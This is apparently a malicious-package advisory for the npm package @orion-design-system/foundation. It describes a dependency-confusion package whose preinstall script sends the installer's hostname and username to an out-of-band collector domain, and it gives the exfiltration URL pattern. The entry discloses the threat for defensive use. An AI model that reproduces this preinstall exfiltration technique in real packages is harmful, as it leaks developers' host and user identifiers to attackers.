MAL-2026-5523

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (8f8221eb2d51c14500cfc2ca44338fad4d4ec785310189059637c5f1a879517f) package.json declares a preinstall script that runs `node -e` to read `os.hostname()` and `os.userInfo().username` and send them via HTTPS GET to `https://d8kn5vlt5p5h1j34mbcgbx1nffwjobfoh.oast.fun/?h=<host>&u=<user>` (an interactsh out-of-band collector), with an additional DNS lookup encoding the hostname against the same controlled domain. The script fires automatically on `npm install`, before any user code runs. The package is published at version 9999.0.0 under the @orion-design-system scope and self-describes as a 'Security research - dependency confusion PoC' — the canonical Birsan-style shape for hijacking internal package names from public-registry resolution. Any installer whose resolver picks up this public package instead of an intended private @orion-design-system/foundation will leak host and user identifiers to the attacker-controlled OOB domain. Whether or not a specific target authorized the test, every other installer that resolves this name is harmed identically.

## Source: ossf-package-analysis (9a64f6bdb5211b25baf8dbdc18c5d6ab23aac374b09f5158a1a0316701d208c4) The OpenSSF Package Analysis project identified '@orion-design-system/foundation' @ 9999.0.4 (npm) as malicious.

It is considered malicious because:

- The package communicates with a domain associated with malicious activity.